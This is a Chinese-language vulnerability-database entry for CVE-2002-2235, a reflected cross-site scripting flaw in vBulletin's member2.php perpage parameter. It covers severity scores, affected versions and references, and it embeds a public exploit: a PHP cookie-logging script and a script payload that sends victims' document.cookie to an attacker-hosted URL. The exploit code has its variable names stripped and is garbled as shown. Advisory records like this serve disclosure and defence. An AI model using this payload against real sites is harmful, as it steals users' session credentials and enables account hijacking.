CVE-2002-2235
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:41
NMCOE    

[原文]member2.php in vBulletin 2.2.9 and earlier does not properly restrict the $perpage variable to be an integer, which causes an error message to be reflected back to the user without quoting, which facilitates cross-site scripting (XSS) and possibly other attacks.


[CNNVD]VBulletin members2.php跨站脚本漏洞(CNNVD-200212-137)

        vBulletin 2.2.9及其早期版本的member2.php不能正确限制$perpage变量为整数。这导致出错消息反映到没有引用的用户,促进跨站脚本(XSS)和可能其他攻击。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-189 [数值错误]

- CPE (受影响的平台与产品)

cpe:/a:jelsoft:vbulletin:2.0.1
cpe:/a:jelsoft:vbulletin:2.2.9
cpe:/a:jelsoft:vbulletin:2.2.0
cpe:/a:jelsoft:vbulletin:2.2.6
cpe:/a:jelsoft:vbulletin:2.2.7
cpe:/a:jelsoft:vbulletin:2.2.2
cpe:/a:jelsoft:vbulletin:2.2.4
cpe:/a:jelsoft:vbulletin:2.2.9_can
cpe:/a:jelsoft:vbulletin:2.0.2
cpe:/a:jelsoft:vbulletin:2.2.8
cpe:/a:jelsoft:vbulletin:2.0
cpe:/a:jelsoft:vbulletin:2.2.5
cpe:/a:jelsoft:vbulletin:2.2.1
cpe:/a:jelsoft:vbulletin:2.2.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2235
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2235
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-137
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/6246
(UNKNOWN)  BID  6246
http://www.iss.net/security_center/static/10701.php
(UNKNOWN)  XF  vbulletin-member2-perpage-xss(10701)
http://securityreason.com/securityalert/3229
(UNKNOWN)  SREASON  3229
http://online.securityfocus.com/archive/1/301076
(UNKNOWN)  BUGTRAQ  20021123 vBulletin XSS Injection Vulnerability

- 漏洞信息

VBulletin members2.php跨站脚本漏洞
中危 跨站脚本
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        vBulletin 2.2.9及其早期版本的member2.php不能正确限制$perpage变量为整数。这导致出错消息反映到没有引用的用户,促进跨站脚本(XSS)和可能其他攻击。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (22042)

VBulletin 2.0.x/2.2.x members2.php Cross Site Scripting Vulnerability (EDBID:22042)
php webapps
2002-11-25 Verified
0 Sp.IC
N/A [点击下载]
source: http://www.securityfocus.com/bid/6246/info

Due to insufficient sanitization of user supplied values, it is possible to exploit a vulnerability in VBulletin. By passing an invalid value to a variable located in 'members2.php', it is possible to generate an error page which will include attacker-supplied HTML code which will be executed in a legitimate users browser.

This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software. The attacker may use cookie-based authentication credentials to hijack the session of the legitimate user.

    - Run this script on some host:

    <?PHP

      // vBulletin XSS Injection Vulnerability: Exploit
      // ---
      // Coded By  : Sp.IC (SpeedICNet@Hotmail.Com).
      // Descrption: Fetching vBulletin's cookies and storing it into a
log file.

      // Variables:

       = "Cookies.Log";

      // Functions:

      /*

      If (['Action'] = "Log") {

           = "<!--";
           = "--->";

      }
      Else {

            = "";
            = "";

      }

      Print ();

      */

      Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
      Print ("<Pre>");
      Print ("<Center>");
      Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
      Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");

      /*

      Print ();

      */

      Switch (['Action']) {

          Case "Log":

                  = ['Cookie'];

                  = StrStr (, SubStr (, BCAdd (0x0D,
StrLen (DecHex (MD5 (NULL))))));

                   = FOpen  (, "a+");
                         FWrite (, Trim () . "\n");
                         FClose ();

                         Print   ("<Meta HTTP-Equiv=\"Refresh\"
Content=\"0; URL=" . ['HTTP_REFERER'] . "\">");

          Break;

          Case "List":

                 If (!File_Exists () || !In_Array ()) {

                     Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");

                     Exit  ();

                 }
                 Else {

                     Print ("</Center></Pre>");

                      = Array_UniQue (File ());

                     Print ("<Pre>");

                     Print ("<B>.:: Statics</B>\n");
                     Print ("\n");

                     Print ("^ Logged Records : <B>" . Count (File
()) . "</B>\n");
                     Print ("^ Listed Records : <B>" . Count

() . " </B>[Not Counting Duplicates]\n");
                     Print ("\n");

                     Print ("<B>.:: Options</B>\n");
                     Print ("\n");

                     If (Count (File ()) > 0) {

                         ['Download'] = "[<A Href=\"" .
 . "\">Download</A>]";

                     }
                     Else{

                         ['Download'] = "[No Records in Log]";

                     }

                     Print ("^ Download Log   : " . 
['Download'] . "\n");
                     Print ("^ Clear Records  : [<A Href=\"" .
 . "?Action=Delete\">Y</A>]\n");
                     Print ("\n");

                     Print ("<B>.:: Records</B>\n");
                     Print ("\n");

                     While (List ([0], [1]) = Each ()) {

                         Print ("<B>" . [0] . ": </B>" . [1]);

                     }

                 }

                 Print ("</Pre>");

          Break;

          Case "Delete":

              @UnLink ();

              Print   ("<Br><Br><B>Deleted
Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete
Log</B></Center></Pre>");

              Print   ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
['HTTP_REFERER'] . "\">");

          Break;

      }

    ?>
    - Give a victim this link: member2.php?s=[Session]
&action=viewsubscription&perpage=[Script Code]

    - Note: You can replace [Script Code] with: --
><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+
(document.cookie);</Script>

    - Then go to Http://[Exploit Path]?Action=List		

- 漏洞信息

60071
vBulletin member2.php perpage Parameter Error Message XSS
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

vBulletin contains a flaw that allows a remote cross site scripting (XSS) attack. This flaw exists because the application does not validate the 'perpage' parameter upon submission to the 'member2.php' script. This may allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.

- 时间线

2002-11-23 Unknow
2002-11-23 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站